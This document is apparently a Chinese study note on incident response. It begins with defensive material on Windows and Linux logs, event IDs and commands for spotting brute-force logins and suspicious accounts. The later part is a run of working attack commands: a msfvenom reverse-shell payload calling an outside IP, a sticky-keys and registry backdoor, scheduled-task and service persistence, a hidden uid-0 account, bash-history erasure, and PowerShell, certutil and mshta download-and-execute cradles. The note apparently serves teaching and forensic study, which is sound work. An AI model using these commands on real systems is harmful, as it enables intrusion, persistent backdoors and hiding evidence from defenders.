Safe: 11-应急响应

net user /add test$ # 增加隐藏账号命令

LogParser.exe -i:evt "select top 100 * from D:\离线工具\Security.evtx " - o:DATAGRID
LogParser.exe -i:输入文件的格式 SQL语句 -o：输出文件的格式

参数使用
-i:<输入源>
中间部分，sql语句
-o:<输出格式>

tasklist | findstr "PID编号"

netstat -ano | find "ESTABLISHED"
tasklist | findstr "8284"

tasklist /svc

C:\Users\jasper>tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                       136 N/A

1）查看端口对应的 PID：netstat -ano | findstr "port"

2）查看进程对应的 PID：任务管理器 -- 查看 -- 选择列 -- PID 或者 tasklist | findstr "PID"

3）查看进程对应的程序位置：
   任务管理器 -- 选择对应进程 -- 右键打开文件位置
   运行输入wmic，cmd 界面输入 process

4）tasklist /svc 进程 -- PID -- 服务

5）查看Windows服务所对应的端口：
   %systemroot%/system32/drivers/etc/services（一般 %systemroot% 就是 C:\Windows 路 径）

1、用户信息文件/etc/passwd
root:x:0:0:root:/root:/bin/bash

account:password:UID:GID:GECOS:directory:shell
用户名：密码：用户ID：组ID：用户说明：家目录：登陆之后的shell 注意：无密码只允许本机登陆，远程不允许登陆

2、影子文件 /etc/shadow
root:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft 7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7:::

用户名：加密密码：最后一次修改时间：最小修改时间间隔：密码有效期：密码需要变更前的警告天数：密码 过期后的宽限时间：账号失效时间：保留字段

系统用户是不能登录的，密码字段为星号（*）；
两个感叹号（!!）表示这个用户被锁定了，无法登录；
美元符号（$）出现在加密格式的密码里，起到分隔作用；

由三部分组成的，以$分隔，即：$id$salt$encrypted  $数字$随机数$加密后的密码串；第3个 $ 分隔的才是真正的密码串；id表示加密算法，当id为1时，使用md5加密，以此类推，id为6采用SHA512进行加密。

who 查看当前登录用户（tty 本地登陆 pts 远程登录）

w 查看系统信息，想知道某一时刻用户的行为

uptime 查看登陆多久、多少用户，负载状态

1）查询特权用户(uid为0)
awk -F: '$3==0{print $1}' /etc/passwd

2）查询可以远程登录的账号信息
awk '/\$1|\$6/{print $1}' /etc/shadow

3）除root账号外，其他账号是否存在sudo权限。如非管理需要，普通账号应删除sudo权限
more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"

4）禁用或删除多余及可疑的账号
usermod -L user 禁用账号，账号无法登录，/etc/shadow 第二栏为 ! 开头
userdel user 删除 user 用户
userdel -r user 将删除 user 用户，并且将 /home 目录下的 user 目录一并删除

1、root用户的历史命令
histroy

2、打开 /home 各账号目录下的 .bash_history，查看普通账号执行的历史命令。

3、历史操作命令的清除：history -c
但此命令并不会清除保存在文件中的记录，因此需要手动删除 .bash_profile 文件中的记录。

进入用户目录下，导出历史命令
cat .bash_history >> history.txt

netstat -antlp

查看 pid 所对应的进程文件路径:
运行 ls -l /proc/$PID/exe 或 file /proc/$PID/exe（$PID 为对应的 pid 号）

ps aux | grep pid

运行级别 含义
0 关机
1 单用户模式，可以想象为windows的安全模式，主要用于系统修复
2 不完全的命令行模式，不含NFS服务
3 完全的命令行模式，就是标准字符界面
4 系统保留
5 图形模式
6 重启动

chkconfig --list [name] //服务列表[可根据实际需要，停掉不用服务]
chkconfig --add [name] //服务添加[如缺省，则从缺省的init脚本自动建立]
chkconfig --del [name] //服务删除[并把相关符号连接从/etc/rc[0-6].d删除]

/etc/rc.d/rc.local
/etc/rc.d/rc[0~6].d

ls -l /etc/rc.d/rc3.d/

crontab -l 列出某个用户cron服务的详细内容
Tips：默认编写的crontab文件会保存在 /var/spool/cron/用户名 例如: /var/spool/cron/root

crontab -r 删除每个用户cron任务(谨慎：删除所有的计划任务)

crontab -e 使用编辑器编辑当前的crontab文件 如：
*/1 * * * * echo "hello world" >> /tmp/test.txt #每分钟写入文件
#星号代表分时日月周

/var/spool/cron/*
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/
/etc/anacrontab
/var/spool/anacron/*

chkconfig [--level 运行级别] [独立服务名] [on|off]
chkconfig –-level 2345 httpd on 开启自启动
chkconfig httpd on （默认level是2345）

chkconfig --list 查看服务自启动状态，可以看到所有的RPM包安装的服务
ps aux | grep crond 查看当前服务

查看系统在3与5级别下的启动项
中文环境
chkconfig --list | grep "3:启用\|5:启用"
英文环境
chkconfig --list | grep "3:on\|5:on"

源码包服务的启动管理：/usr/local/
源码包服务的自启动管理：/etc/rc.d/init.d/

日志文件 说明
/var/log/cron 记录了系统定时任务相关的日志

/var/log/cups 记录打印信息的日志

/var/log/dmesg 记录了系统在开机时内核自检的信息，也可以使用dmesg命令直接查看内核自检信息

/var/log/mailog 记录邮件信息

/var/log/message 记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息，如果系统出现问题时，首先要检查的就应该是这个日志文件

/var/log/btmp 记录错误登录日志，这个文件是二进制文件，不能直接vi查看，而要使用lastb命令查看

/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志，这个文件是二进制文件，不能直接vi，而要使用lastlog命令查看

/var/log/wtmp 永久记录所有用户的登录、注销信息，同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件，不能直接vi，而需要使用last命令来查看

/var/log/utmp 记录当前已经登录的用户信息，这个文件会随着用户的登录和注销不断变化，只记录当前登录用户的信息。同样这个文件不能直接vi，而要使用w，who，users等命令来查询

/var/log/secure 记录验证和授权方面的信息，只要涉及账号和密码的程序都会记录，比如SSH登录，su切换用户，sudo授权，甚至添加用户和修改用户密码都会记录在这个日志文件中

1、定位有多少IP在爆破主机的root账号：
grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

2、定位有哪些IP在爆破：
grep "Failed password" /var/log/secure | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]? [0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]? [0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c

3、爆破用户名字典是什么？
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}' | uniq -c | sort -nr

4、登录成功的IP有哪些：
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

5、登录成功的日期、用户名、IP：
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

C:\Users\jasper\d_safe_2.1.7.2>certutil -hashfile D_Safe_Manage.exe MD5
MD5 hash of D_Safe_Manage.exe:
e2ec949fd70c4c921ee38979dda39d11
CertUtil: -hashfile command completed successfully.

def md5sum(file):
    m=hashlib.md5()
    if os.path.isfile(file):
        f=open(file,'rb')
        for line in f:
            m.update(line)
        f.close
    else:
        m.update(file)
    return (m.hexdigest())

diff -c -a -r 2.php 3.php

记录操作系统组件产生的事件，主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日 志中记录的时间类型由Windows操作系统预先定义。
默认位置： %SystemRoot%\System32\Winevt\Logs\System.evtx

包含由应用程序或系统程序记录的事件，主要记录程序运行方面的事件，例如数据库程序可以在应用程序日志 中记录文件错误，程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况，那么我们可以 从程序事件日志中找到相应的记录。

默认位置：%SystemRoot%\System32\Winevt\Logs\Application.evtx

记录系统的安全审计事件，包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、账号管理、 策略变更、系统事件。安全日志也是调查取证中最常用到的日志。默认设置下，安全日志是关闭的，可以使用 组策略来启动安全日志，或者在注册表中设置审核策略，以便当安全日志满后使系统停止响应。

默认位置：%SystemRoot%\System32\Winevt\Logs\Security.evtx

事件ID 说明
4624 登录成功
4625 登录失败
4634 注销成功
4647 用户启动的注销
4672 使用超级用户（如管理员）进行登录
4720 创建用户

日志文件 说明
/var/log/cron 记录了系统定时任务相关的日志

/var/log/cups 记录打印信息的日志

/var/log/dmesg 记录了系统在开机时内核自检的信息，也可以使用dmesg命令直接查看内核自检信息

/var/log/mailog 记录邮件信息

/var/log/message 记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息，如果系统出现问题时，首先要检查的就应该是这个日志文件

/var/log/btmp 记录错误登录日志，这个文件是二进制文件，不能直接vi查看，而要使用lastb命令查看

/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志，这个文件是二进制文件，不能直接vi，而要使用lastlog命令查看

/var/log/wtmp 永久记录所有用户的登录、注销信息，同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件，不能直接vi，而需要使用last命令来查看

/var/log/utmp 记录当前已经登录的用户信息，这个文件会随着用户的登录和注销不断变化，只记录当前登录用户的信息。同样这个文件不能直接vi，而要使用w，who，users等命令来查询

/var/log/secure 记录验证和授权方面的信息，只要涉及账号和密码的程序都会记录，比如SSH登录，su切换用户，sudo授权，甚至添加用户和修改用户密码都会记录在这个日志文件中

登录失败记录：/var/log/btmp
最后一次登录：/var/log/lastlog
登录成功记录: /var/log/wtmp
登录日志记录：/var/log/secure
目前登录用户信息：/var/run/utmp
历史命令记录：history
仅清理当前用户的历史命令： history -c

1、列出当天访问次数最多的IP命令：
cut -d- -f 1 log_file|uniq -c | sort -rn | head -20

2、查看当天有多少个IP访问：
awk '{print $1}' log_file|sort | uniq | wc -l

3、查看某一个页面被访问的次数：
grep "/index.php" log_file | wc -l

4、查看每一个IP访问了多少个页面：
awk '{++S[$1]} END {for (a in S) print a,S[a]}' log_file

5、将每个IP访问的页面数进行从小到大排序：
awk '{++S[$1]} END {for (a in S) print S[a],a}' log_file | sort -n

6、查看某一个IP访问了哪些页面：
grep ^IP log_file| awk '{print $1,$7}'

7、去掉搜索引擎统计当天的页面：
awk '{print $12,$1}' log_file | grep ^\"Mozilla | awk '{print $2}' | sort | uniq | wc -l

8、查看2022年6月21日14时这一个小时内有多少IP访问:
awk '{print $4,$1}' log_file | grep 21/Jun/2022:14 | awk '{print $2}'| sort | uniq | wc -l

more u_ex180408.log | grep "asp;."

... /up/dj/2012.asp;.jgp  ...

Mozilla/4.0+ (compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/7.0;+SLCC2;+.NET+CLR+2.0.50727;+.N ET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+.NET4.0C;+.NET4.0E)

A、攻击者访问首页和登录页
B、攻击者访问MsgSjlb.aspx和MsgSend.aspx
C、攻击者访问Xzuser.aspx
D、攻击者多次POST（怀疑通过这个页面上传模块缺陷）
E、攻击者访问了图片木马

grep -E 'Googlebot|Baiduspider' /www/logs/access.2019-02-23.log | awk '{ print $1 }' | sort | uniq

cat /www/logs/access.2019-02-23.log | grep -v -E 'MSIE|Firefox|Chrome|Opera|Safari|Gecko|Maxthon' | sort | uniq -c | sort -r -n | head -n 100

grep '23/May/2019' /www/logs/access.2019-02-23.log | awk '{print $1}' | awk -F'.' '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -r -n | head -n 3
    2206 219.136.134.13
    1497 182.34.15.248
    1431 211.140.143.100 

cat /www/logs/access.2019-02-23.log | awk '{print $1}' | awk -F'.' '{print $1"."$2"."$3".0"}' | sort | uniq -c | sort -r -n | head -n 200

cat /www/logs/access.2019-02-23.log | awk '{print $2}' | sort | uniq -c | sort - rn | more

cat /www/logs/access.2019-02-23.log | awk '{print $9}' | sort | uniq -c | sort - rn | more
    5056585 304
    1125579 200
    7602 400
    5 301

cat /www/logs/access.2019-02-23.log | awk '{print $7}' | sort | uniq -c | sort - rn | more

cat /www/logs/access.2019-02-23.log | awk '{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}' | sort -rn | more

grep ' 200 ' /www/logs/access.2019-02-23.log | awk '{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}' | sort -rn | more

cat /www/logs/access.2019-02-23.log | awk '{print $7}' | egrep '\?|&' | sort | uniq -c | sort -rn | more

grep -v 0$ /www/logs/access.2019-02-23.log | awk -F '\" ' '{print $4" " $1}' web.log | awk '{print $1" "$8}' | sort -n -k 1 -r | uniq > /tmp/slow_url.txt

# tail -f /www/logs/access.2019-02-23.log | grep '/test.html' | awk '{print $1" "$7}'

hydra 192.168.75.131 mysql -l root -P pwd.txt -vV

80 Connect [email protected] on using TCP/IP
80 Connect Access denied for user 'root'@'192.168.108.128' (using password: YES)

2022-11-06T13:49:03.648194Z 145 Connect root@LAPTOP-5NFOIJFJ on using TCP/IP
2022-11-06T13:49:03.648194Z 145 Query SET NAMES utf8mb4
2022-11-06T13:49:03.710594Z 145 Query SHOW VARIABLES LIKE 'lower_case_%';
2022-11-06T13:49:03.835394Z 145 Query SHOW VARIABLES LIKE 'sql_mode';
2022-11-06T13:49:03.882194Z 145 Query SELECT COUNT(*) AS support_ndb FROM information_schema.ENGINES WHERE Engine = 'ndbcluster'
2022-11-06T13:49:03.897794Z 145 Query SELECT SCHEMA_NAME, DEFAULT_CHARACTER_SET_NAME, DEFAULT_COLLATION_NAME FROM

2022-11-06T13:49:03.648194Z 111 Connect root@localhost on 111 Query select @@version_comment limit 1
2022-11-06T13:49:03.710594Z 145 Quit

grep "Access denied" Win7-PC.log |cut -d "'" -f4 | uniq -c | sort -nr
  50 192.168.108.128
  20 LAPTOP-5NFOIJFJ

grep "Access denied" Win7-PC.log |cut -d "'" -f2 | uniq -c | sort -nr
  70 root

net user test$ 111qqq! /add #创建隐藏账号
net user

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=121.196.62.22 LPORT=7764 -f exe >7764.exe

use exploit/multi/hander
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 7764
exploit

meterpreter> getuid
Server username: WIN-148\Administrator

migrate 320 # 进程迁移，320为正常服务的进程号

move sethc.exe sethc1.exe #将原本的sethc改名为sethc1
copy cmd.exe sethc.exe #将cmd复制并重命名为sethc

REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Users\Administrator\Desktop\7764.exe"
#创建键为：UserInitMprLogonScript，其键值为我们要启动的程序路径

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test1 /t REG_SZ /d "C:\Users\Administrator\Desktop\7764.exe"

schtasks /Create /tn Updater /tr C:\Users\Administrator\Desktop\7764.exe /sc minute /mo 1 #每1分钟自动执行7764.exe
chcp 437 #修改编码
schtasks #查看计划任务

schtasks /delete /tn Updater

sc create test binpath= C:\Users\Administrator\Desktop\7764.exe （注意等号后面有空 格）#创建服务
sc config test start= auto #设置服务为自动启动，即使服务被关闭了还会被启动起来
net start test #启动服务

touch .1.txt

touch -t 1908081042.30 one.php

chattr +i evil.php 为文件添加锁定属性
lsattr evil.php 属性查看
chattr -i evil.php 解除锁定
rm -rf evil.php 删除文件

[space]set +o history

[Space]set -o history 它将环境恢复原状，也就是你完成了你的工作，执行上述命令之后的命令都会出现在历史中。 

history | grep "keyword"

history -d [num]

sed -i '150,$d' .bash_history

# 创建一个用户名guest，密码123456的普通用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest

# useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句
useradd -p "$(openssl passwd -1 123456)" guest

# chpasswd方法
useradd guest;echo 'guest:123456'|chpasswd

# echo -e方法
useradd test;echo -e "123456\n123456\n" |passwd test

# 创建一个用户名guest，密码123456的root用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest1 -o -u 0 -g root -G root -s /bin/bash -d /home/test

]# su guest
]# whoami
root

# 查询特权用户特权用户(uid 为0)
[root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd

# 查询可以远程登录的账号信息
[root@localhost ~]# awk '/\$1|\$6/{print $1}' /etc/shadow

# 除root账号外，其他账号是否存在sudo权限。如非管理需要，普通账号应删除sudo权限
[root@localhost ~]# more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"

ssh-keygen -t rsa

cat id_rsa.pub >> authorized_keys

PermitRootLogin yes
PubkeyAuthentication yes

/etc/init.d/ssh start

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.85.1/one.exe','one.exe')

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.85.1/one.exe'))"

bitsadmin /transfer n http://192.168.85.1/one.exe .\

#下载文件
certutil -urlcache -split -f http://192.168.85.1/one.exe one.exe
#删除缓存
certutil -urlcache -split -f http://192.168.85.1/one.exe one.exe delete

#生成msi包作用是执行calc.exe
msfvenom -p windows/exec CMD='calc.exe' -f msi > calc.msi
#远程执行
msiexec /q /i http://192.168.85.1/calc.msi

mshta http://192.168.85.1/run.hta

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
  <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe" // 这里填写命令
    self.close
  </script>
  <body>
    demo
</body>
</HEAD>
</HTML>

-U：设置后门在用户登录后自启动。该方式会在 HKCU\Software\Microsoft\Windows\CurrentVersion\Run 下添加注册表信息。
-X：设置后门在系统启动后自启动。该方式会在 HKLM\Software\Microsoft\Windows\CurrentVersion\Run 下添加注册表信息。这里可能会由于环境 问题，导致添加失败，后门将无法启动。
-S：作为服务自动启动代理程序（具有SYSTEM权限）

run persistence -X -i 5 -p 9999 -r IP -P windows/x64/meterpreter/reverse_tcp

# 后门文件位置：
C:\Windows\Temp C:\Users\Administrator\AppData\Local\Temp
# 注册表位置：
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\